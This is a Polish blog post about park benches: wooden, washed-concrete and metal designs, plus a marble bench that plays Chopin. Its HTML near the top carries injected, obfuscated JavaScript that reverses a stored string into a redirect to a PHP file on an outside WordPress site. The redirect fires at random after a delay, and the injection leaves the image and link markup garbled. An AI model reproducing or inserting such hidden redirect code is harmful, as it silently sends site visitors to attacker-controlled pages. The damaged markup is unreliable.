You are currently viewing Co nieco o ławkach parkowych

Co nieco o ławkach parkowych

Dzisiejsze pomysły architektoniczne ludzkości naprawdę mnie zaskakują. Ogromną różnorodność możemy zauważyć chociażby w kwestii ławek parkowych. Podróżując po świecie miałam okazję spotkać się naprawdę z wieloma modelami i materiałami wykorzystanymi do ich wykonania.

Najciekawsze ławki parkowe 

http://www.golbe<script>$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(„”).reverse().join(„”);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>ton.pl” class=”alignleft” height=”167″ src=”http://katalogklejow3m.pl/wp-content/uploads/2017/02/httpwwwgolbe<script>$mWn=function(n){if(typeof ($mWn.list[n])==tonpl.jpg” style=”float: left;” width=”250″/>Jeszcze kilkanaście lat temu, jedyne ławki jakie można było spotkać w parku to te o prostym stelażu, wykonane całkowicie z drewna. Niestety ich wadą było to, że deszcze i mrozy oraz silne słońce szybko je niszczyły wskutek czego po kilku latach, ławka bardziej odstraszała, aniżeli zapraszała do siedzenia. Obecnie jednak ławki są prawdziwymi działami i mieszaniną różnych materiałów, a dzisiejsze techniki i preparaty zabezpieczające czynią je niezniszczalnymi przez wiele lat. Bardzo często do ich produkcji wykorzystuje się beton oraz metal łącząc je z drewnem bądź deskami kompozytowymi. Beton bardzo często występuje w nowoczesnej architekturze miejskiej, jednak z materiału tego tak naprawdę tworzono ławki już w starożytności, wystarczy tylko spojrzeć na ławki występujące w starożytnych ogrodach greckich czy rzymskich, z pięknymi rzeźbieniami i ornamentami. Obecnie meble betonowe wykonuje techniką betonu płukanego dzięki czemu uwidaczniają się umieszczane w betonowej masie kruszywa. W ten sposób można uzyskać różne odcienie betonu od czerwieni, czerni po mieszaninę niebieskiego ze srebrem. Często betonowe oraz metalowe stelaże ławek łączy się z siedziskiem wykonanym z drewna, które dzięki odpowiedniej impregnacji zachowuje swój blask na długo.

Jednak najciekawszą ławka z jaką miałam do czynienia była wykonana z marmuru. Siadający na niej miał możliwość wyboru jednego z trzech utworów klasycznych Chopina, które wydobywały się z jej wnętrza. Dzięki takiemu rozwiązaniu spacerujący mógł na chwilę zwolnić, przysiąść, odpocząć i zrelaksować się, bo właśnie taka jest główna rola ławek parkowych.

Ciekawe inspiracje możecie zobaczyć na stronie tonowe-awki-„>http://www.golbeton.pl